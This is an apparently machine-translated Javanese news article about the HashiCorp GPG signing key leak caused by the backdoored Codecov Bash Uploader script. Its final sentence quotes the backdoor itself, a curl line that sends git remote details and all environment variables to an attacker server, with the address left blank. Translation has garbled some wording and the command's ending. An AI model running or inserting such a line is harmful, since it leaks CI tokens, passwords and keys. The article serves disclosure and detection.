HashiCorp, sing dikenal kanggo ngembangake alat sumber terbuka Vagrant, Packer, Nomad lan Terraform, ngumumake bocor kunci GPG pribadi sing digunakake kanggo nggawe tandha digital sing verifikasi rilis. Penyerang sing entuk akses menyang kunci GPG duweni potensi nggawe owah-owahan sing didhelikake kanggo produk HashiCorp kanthi verifikasi kanthi tandha digital sing bener. Ing wektu sing padha, perusahaan kasebut nyatakake yen sajrone audit, ora ana jejak upaya kanggo nggawe modifikasi kasebut.
Saiki, kunci GPG sing dikompromi wis dicabut lan kunci anyar wis dilebokake ing panggonane. Masalah mung kena pengaruh verifikasi nggunakake file SHA256SUM lan SHA256SUM.sig, lan ora mengaruhi generasi teken digital kanggo paket Linux DEB lan RPM sing diwenehake liwat releases.hashicorp.com, uga mekanisme verifikasi rilis kanggo macOS lan Windows (AuthentiCode) .
Bocor kasebut kedadeyan amarga nggunakake skrip Codecov Bash Uploader (codecov-bash) ing infrastruktur, dirancang kanggo ngundhuh laporan jangkoan saka sistem integrasi sing terus-terusan. Sajrone serangan ing perusahaan Codecov, lawang mburi didhelikake ing skrip sing ditemtokake, sing dikirimake sandhi lan kunci enkripsi menyang server penyerang.
Kanggo hack, para panyerang njupuk kauntungan saka kesalahan ing proses nggawe gambar Codecov Docker, sing ngidini dheweke ngekstrak data akses menyang GCS (Google Cloud Storage), sing perlu kanggo ngganti skrip Bash Uploader sing disebarake saka codecov.io. situs web. Owah-owahan kasebut ditindakake tanggal 31 Januari, tetep ora dideteksi sajrone rong wulan lan ngidini panyerang ngekstrak informasi sing disimpen ing lingkungan sistem integrasi terus-terusan pelanggan. Nggunakake kode jahat sing ditambahake, panyerang bisa entuk informasi babagan gudang Git sing diuji lan kabeh variabel lingkungan, kalebu token, kunci enkripsi lan sandhi sing dikirim menyang sistem integrasi sing terus-terusan kanggo ngatur akses menyang kode aplikasi, repositori lan layanan kayata Amazon Web Services lan GitHub.
Saliyane telpon langsung, script Codecov Bash Uploader digunakake minangka bagΓ©an saka uploader liyane, kayata Codecov-action (Github), Codecov-circleci-orb lan Codecov-bitrise-step, kang kedhaftar uga kena pengaruh masalah. Kabeh pangguna codecov-bash lan produk sing gegandhengan dianjurake kanggo mriksa prasarana, uga ngganti tembung sandhi lan kunci enkripsi. Sampeyan bisa mriksa ananΓ© backdoor ing skrip kanthi ananΓ© baris curl -sm 0.5 -d "$(git remote -v)<<<<<< ENV $(env)" http:// /upload/v2 || bener
Source: opennet.ru